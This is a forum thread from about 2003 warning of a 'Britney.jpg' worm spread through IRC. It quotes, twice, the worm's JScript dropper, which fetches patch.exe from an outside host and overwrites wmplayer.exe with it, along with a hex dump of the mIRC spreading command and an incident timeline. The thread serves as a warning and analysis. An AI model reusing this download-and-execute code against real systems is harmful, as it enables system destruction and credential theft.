Britney.jpg worm warning
The Oracle
Thread Starter
Join Date: Aug 2001
Location: Naples, Florida U.S.A.
Posts: 2,902
Likes: 0
Received 0 Likes
on
0 Posts
Britney.jpg worm warning
According to warp2search.net :
You know, it was only a matter of time before they were able to get .jpg's to carry viruses.
Richard
Sunday the 26. another internet worm was released through IRC networks.
The worm is disguised as a .jpg picture named Britney.jpg from Angelfire. Whatever you do do not open britney links in Internet explorer.
An exploit taking advantage of holes in Internet Explorer along with Windows Media Player ensures the worm free passage to your computer, where it starts deleting system files and destroying the registry.
The effect of this is: no shortcuts work, no programs, except those already running will work. If mirc is running it will proceed by installing a script that announces the url to britney.jpg in all the channels you have joined. Some have mentioned that it even uploads sites.dat from your FlashFXP directory.
The worm is disguised as a .jpg picture named Britney.jpg from Angelfire. Whatever you do do not open britney links in Internet explorer.
An exploit taking advantage of holes in Internet Explorer along with Windows Media Player ensures the worm free passage to your computer, where it starts deleting system files and destroying the registry.
The effect of this is: no shortcuts work, no programs, except those already running will work. If mirc is running it will proceed by installing a script that announces the url to britney.jpg in all the channels you have joined. Some have mentioned that it even uploads sites.dat from your FlashFXP directory.
Richard
Join Date: Sep 2002
Location: Chichester, UK
Posts: 1,650
Likes: 0
Received 0 Likes
on
0 Posts
Are you sure about this one, Richard? I've not been able to find it on Symantec or McAfee's databases and they're usually fairly up to date. There are a couple of 'britney.jpg.exe' type nastys but nothing that matches this - any more info?
Join Date: Oct 2000
Location: Brighton. UK. (Via Liverpool).
Posts: 5,068
Likes: 0
Received 0 Likes
on
0 Posts
Unless one has requested a picture of Britney from a mate or from her web-site (or someone you know called britney), then I can't understand why people open these things.... 
They deserve all they they get for being so stupid. If you havn't asked for it, don't open it......!!!!!!!!
They deserve all they they get for being so stupid. If you havn't asked for it, don't open it......!!!!!!!!
Join Date: Sep 2002
Location: Chichester, UK
Posts: 1,650
Likes: 0
Received 0 Likes
on
0 Posts
I agree BRL, you are fairly dumb to click on a random attachment (but there are lots of dumb PC users...) but being able to deliever a nasty in a real jpeg is a bit different. What if you could stick it in a banner ad, so someone surfing PPRuNe would download it and IE would happily f
k up your PC?
I half remember reading something about how it was possible, at least in theory, to hide executable code within a jpeg, so if there's a real live jpeg-transmitted trojan out there I'm quite interested.
<edit> bit of searching found something, looks like it is just opening a stream to windows media player and using some kind of exploit in that, don't think it's a real jpeg exploit - however, don't know if it's real and would still like a link to somebody i've heard of
k up your PC? I half remember reading something about how it was possible, at least in theory, to hide executable code within a jpeg, so if there's a real live jpeg-transmitted trojan out there I'm quite interested.
<edit> bit of searching found something, looks like it is just opening a stream to windows media player and using some kind of exploit in that, don't think it's a real jpeg exploit - however, don't know if it's real and would still like a link to somebody i've heard of
The Oracle
Thread Starter
Join Date: Aug 2001
Location: Naples, Florida U.S.A.
Posts: 2,902
Likes: 0
Received 0 Likes
on
0 Posts
Here is the transcript of what happens with the Worm. I do not believe it has an .exe in front of it, or I would not have reported it here.
The timeline:
Take Care,
Richard
The timeline:
DO NOT CLICK ON britney.jpg!!!
Under no circumstances open an URL that ends with britney.jpg. It is actually
an Internet Explorer / Windows Media Player exploit, as shown below.
-----
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
-----
patch.exe seems to be compressed with UPX, interesting strings can be found within.
0005 18E0 2F 2E 61 6D 73 67 20 68 74 74 70 3A 2F 2F 77 77 /.amsg http://ww
0005 18F0 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 6F 6D 2F w.angelfire.com/
0005 1900 63 65 6C 65 62 32 2F 70 69 63 73 78 2F 62 72 69 celeb2/picsx/bri
0005 1910 74 6E 65 79 2E 6A 70 67 20 3C 2D 20 75 75 68 2C tney.jpg <- uuh,
0005 1920 20 63 68 65 63 6B 20 69 74 20 6F 75 74 20 21 21 check it out !!
This is a command it sends automatically to mIRC. This causes mIRC to send the
exploit URL to all channels you are in.
It will replace/delete Windows system files. If that happens, you might get a
message of this sort: "Files that are required for Windows to run properly have
been replaced by unrecognized versions".
This is NOT the same thing as http://koti.phnet.fi/jonninen/mircworms/britny.txt.
15:30: At this time I don't know if the worm can be removed. If it manages to delete
your Windows system files, you'll have to reinstall Windows.
15:40: Angelfire and scavenger.sharewith.us have been informed of the exploit they
are hosting.
16:00: The first sighting of this was at about 14:29 in IRCnet, 14:34 (+0200) in
EFnet.
According to reports, simply "repairing" the Windows install or copying the deleted
files back isn't enough, since the virus also messes around with the Windows registry.
You'll have to reinstall Windows.
16:30: According to reports, the URL was seen in Quakenet at 14:13. Figures. :-)
16:40: According to reports, the URL was seen in IRCnet at 14:21 and at 14:32 in mIRC-X.
17:00: There's a list of Windows system files in the uncompressed version of patch.exe
starting at around offset 0x510c0, including (but not limited to) ntoskrnl.exe,
userinit.exe, services.exe, etc. There are also references to some anti-virus and
firewall programs in the immediate vicinity. The virus probably disables these
programs so that it can roam freely.
Reports say that the virus does not affect Windows 98, but it definitely affects
at least Windows 2000 and XP. Anti-virus software does not help you at this point,
since none of them recognize the virus yet.
The scavenger.sharewith.us site has been disabled. This prevents the virus from
infecting machines for now, but the Angelfire page is still up and the author of
the virus could modify the page to point to another location.
The IE exploit: http://www.security.nnov.ru/search/d...asp?docid=5102
17:30: The virus might not affect Windows Media Player version 8. (see
http://www.kb.cert.org/vuls/id/222044)
19:10: According to reports, the virus does affect WMP 8 as well. Better not open
any suspicious links as long as you use IE.
2003-10-28 01:10: The exploit has been removed from Angelfire's server as well.
2003-10-28 01:10 (+0200), /msg Gridle in IRCnet or EFnet if you have more information.
Under no circumstances open an URL that ends with britney.jpg. It is actually
an Internet Explorer / Windows Media Player exploit, as shown below.
-----
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
-----
patch.exe seems to be compressed with UPX, interesting strings can be found within.
0005 18E0 2F 2E 61 6D 73 67 20 68 74 74 70 3A 2F 2F 77 77 /.amsg http://ww
0005 18F0 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 6F 6D 2F w.angelfire.com/
0005 1900 63 65 6C 65 62 32 2F 70 69 63 73 78 2F 62 72 69 celeb2/picsx/bri
0005 1910 74 6E 65 79 2E 6A 70 67 20 3C 2D 20 75 75 68 2C tney.jpg <- uuh,
0005 1920 20 63 68 65 63 6B 20 69 74 20 6F 75 74 20 21 21 check it out !!
This is a command it sends automatically to mIRC. This causes mIRC to send the
exploit URL to all channels you are in.
It will replace/delete Windows system files. If that happens, you might get a
message of this sort: "Files that are required for Windows to run properly have
been replaced by unrecognized versions".
This is NOT the same thing as http://koti.phnet.fi/jonninen/mircworms/britny.txt.
15:30: At this time I don't know if the worm can be removed. If it manages to delete
your Windows system files, you'll have to reinstall Windows.
15:40: Angelfire and scavenger.sharewith.us have been informed of the exploit they
are hosting.
16:00: The first sighting of this was at about 14:29 in IRCnet, 14:34 (+0200) in
EFnet.
According to reports, simply "repairing" the Windows install or copying the deleted
files back isn't enough, since the virus also messes around with the Windows registry.
You'll have to reinstall Windows.
16:30: According to reports, the URL was seen in Quakenet at 14:13. Figures. :-)
16:40: According to reports, the URL was seen in IRCnet at 14:21 and at 14:32 in mIRC-X.
17:00: There's a list of Windows system files in the uncompressed version of patch.exe
starting at around offset 0x510c0, including (but not limited to) ntoskrnl.exe,
userinit.exe, services.exe, etc. There are also references to some anti-virus and
firewall programs in the immediate vicinity. The virus probably disables these
programs so that it can roam freely.
Reports say that the virus does not affect Windows 98, but it definitely affects
at least Windows 2000 and XP. Anti-virus software does not help you at this point,
since none of them recognize the virus yet.
The scavenger.sharewith.us site has been disabled. This prevents the virus from
infecting machines for now, but the Angelfire page is still up and the author of
the virus could modify the page to point to another location.
The IE exploit: http://www.security.nnov.ru/search/d...asp?docid=5102
17:30: The virus might not affect Windows Media Player version 8. (see
http://www.kb.cert.org/vuls/id/222044)
19:10: According to reports, the virus does affect WMP 8 as well. Better not open
any suspicious links as long as you use IE.
2003-10-28 01:10: The exploit has been removed from Angelfire's server as well.
2003-10-28 01:10 (+0200), /msg Gridle in IRCnet or EFnet if you have more information.
Richard
